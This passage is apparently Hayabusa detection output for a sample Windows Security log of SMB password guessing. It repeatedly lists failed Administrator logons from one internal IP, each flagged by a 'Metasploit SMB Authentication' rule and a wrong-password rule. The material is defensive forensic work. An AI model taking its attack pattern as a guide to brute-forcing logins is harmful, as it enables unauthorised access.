Password,User: Administrator : Type: 3 : Workstation: zDgDGO3IKiLoIQ5D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.859 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0aaYeBTUEudC3446 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.024 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I41H8U06uuGlMf9S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.093 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.170 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r6Eh55149gbuU2el : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.170 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ajzJabQi7CjosFQ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l9y7gyU9aJi6Fpm3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.290 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hbLiIVcBYlu5JkX2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.361 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bDfEfHk54J3lJI6m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WOpuMTECalyeObl7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.496 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nZQYU1dyQOqlNJDL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.537 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: pc58gDT07WNH3mMz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.577 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhExnDfInKbEI6AO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.710 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qKKTTQ0ZT2Ye4TV9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.710 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LdBFYyftnH67Gyh5 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.772 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eO6c2PDl7zVBGzPi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.812 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1ONnDOs16EnBkdFv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aTHHCX9EoKRY4zhR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.897 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.939 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f1jhH08oLzpONDpa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.939 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o2YK7zc7Ne9c8txA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.013 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 86CrOo9CFreIzSM5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.013 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 0X9UEojEnc350xPc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9g3PO3jofnySl92G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5TRndfQmPYuhV0Ri : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.176 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.204 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yyJOdaks4B1sKMDv : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.204 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IB3OSmcFx5TUiiJX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lo3Ex40dkIeO53HF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.309 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AkzDG8QOM2cxbokF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.352 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.395 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YoMf36ZXJBLnYxtc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.395 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.436 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5izPIefHqDDWNDlu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.436 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z9o4f1XvvcVXBNwL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.476 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: IjCR48ZJFyEhzrYI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.521 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mUV9i4O2gapcC01d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.556 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XJzGAMQCvJBFOUPq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.608 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fyyu0x6I29R2J10Y : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.645 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.687 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8lCe1shqSs0xNwAJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.687 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ipZAMvm56d5mE9Fc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XX9N7jodTuEYBCSE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.774 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h5DBFGpzfJJ7gYV1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.814 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fQ3qTwcWkXJDuXDI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TOfkvLSo2HuhMtvk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.889 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: y9DQUhPQHvvwAO0C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.940 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.990 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yao1JM0tSFv5IHnL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.990 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NXGm63wiZz3ZYFb9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.077 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: izvPgZCO2GRVLhId : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.077 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.119 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iI9zO2o7jd922pfK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.119 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UnAGy86My6hVwt4J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HhFTzONSVEziRtgq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.208 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
